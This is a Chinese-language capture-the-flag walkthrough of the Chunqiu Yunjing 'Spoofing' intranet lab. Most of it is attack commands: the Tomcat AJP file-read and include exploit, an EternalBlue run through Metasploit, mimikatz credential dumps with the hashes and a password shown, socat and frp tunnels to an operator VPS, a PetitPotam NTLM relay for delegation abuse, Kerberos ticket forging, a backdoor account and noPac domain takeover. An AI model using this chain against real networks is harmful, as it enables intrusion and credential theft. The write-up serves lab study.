渗透
春秋云镜-Spoofing
flag01
fscan梭一下
1 | fscan -h 39.99.139.193 |
8080说是后台管理,其实什么东西都没有。还有个8009端口,看到的时候就感觉是个tomcat。
1 | python dirsearch.py -u http://39.99.139.193/ -e * |
的确是的
发现这个版本的tomcat有个CVE-2020-1938漏洞,可以任意文件读取和文件包含
1 | python3 ajpShooter.py http://39.99.139.193:8080 8009 /WEB-INF/web.xml read |
发现一个UploadServlet,如果能任意文件上传,再配合上文件包含,就可以实现rce了
1 | <% |
上传之后给了具体路径。
1 | python3 ajpShooter.py http://39.99.139.193:8080 8009 /upload/4e1503eabe787f7ecf92dcadfe190f49/20250305085946656.txt eval |
flag01: flag{cf4cd202-1c88-4fc7-8126-1acfcd04781f}
flag02
fscan扫一下
1 | 172.22.11.76:8080 open |
看看有哪些目标
172.22.11.6 DC
172.22.11.26 XIAORANG\XR-LCM3AE8B
172.22.11.76 外网
172.22.11.45 Windows Server 2008 R2(MS17-010
45存在永恒之蓝漏洞,先梭了再说
1 | proxychains msfconsole |
直接拿flag
flag02: flag{cd715209-e4f4-4b84-b6f8-d0498b5256fd}
flag03
抓下哈希
1 | load kiwi |
得到机器账号和yangmei用户密码的ntlm哈希,以及yangmei的明文密码
1 | meterpreter > load kiwi |
扫描一下有什么服务
1 | proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav 2>/dev/null |
这里一开始一用就报错,换了这个才好CrackMapExec/cme/modules/petitpotam.py
1 | proxychains -q crackmapexec smb 172.22.11.0/24 -u 'yangmei' -p 'xrihGHgoNZQ' -M petitpotam |
现在的思路是:使用无ADCS + Petitpotam + ntlm中继打法
用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的msDS-AllowedToActOnBehalfOfOtherIdentity属性,配置到XR-LCM3AE8B.xiaorang.lab的RBCD。
但是有个条件是:默认情况下, WebClient 仅对本地内部网 (Local Intranet) 或受信任的站点 (Trusted Sites) 列表中的目标自动使用当前用户凭据进行 NTLM 认证
我们要把中继(172.22.11.76)的80转发到我们kali的80端口
先在外网靶机(tomcat)上运行
1 | socat tcp-listen:80,reuseaddr,fork tcp:vpsip:8848 |
在vps上运行
1 | ./frps -c ./tmp_frps.ini |
tmp_frps.ini
1 | [common] |
在本地kali上运行
1 | ./frpc -c ./tmp_frpc.ini |
tmp_frpc.ini
1 | [common] |
成功收到连接。
开启中继
1 | proxychains -q impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access |
接着使用Petitpotam触发XR-LCM3AE8B认证到172.22.11.76,这里中继的作用其实就是修改了机器账户的msDS-AllowedToActOnBehalfOfOtherIdentity
1 | proxychains -q python3 PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26 |
把XR-LCM3AE8B.xiaorang.lab的ip加到hosts里
现在就可以申请银票据了(这里如果重开了靶机的话记得重新抓一下XR-LCM3AE8B机器的ntlm哈希
1 | proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :12dc53c0708954250b0123f9a2602f44 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6 |
运行之后得到一个administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache
导入票据
1 | export KRB5CCNAME=administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache |
现在可以无密码连接了(psexec.py和ccache文件得在同一个目录
1 | proxychains -q python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk |
flag03: flag{2f44096c-18fe-413c-8cdb-c7be5da0a4f8}
flag04
发现还有一个MA_Admin组
1 | net group /domain |
1 | net group "MA_Admin" /domain |
存在zhanghui成员
加个账号rdp上去
1 | net user fffffilm Password@973 /add |
传mimikaze抓哈希
1 | privilege::debug |
得到zhanghui的哈希。
1 | * Username : zhanghui |
因为zhanghui是MA_Admin组内成员,对computer能够创建对象,能向域中添加机器账户,所以能打noPac。Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287
1 | proxychains -q python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell |
flag04: flag{6f346099-4b13-4c55-bcb0-260addbd59ba}
参考文章
春秋云境·Spoofing – fushulingのblog
【内网渗透】最保姆级的春秋云镜Spoofing打靶笔记-CSDN博客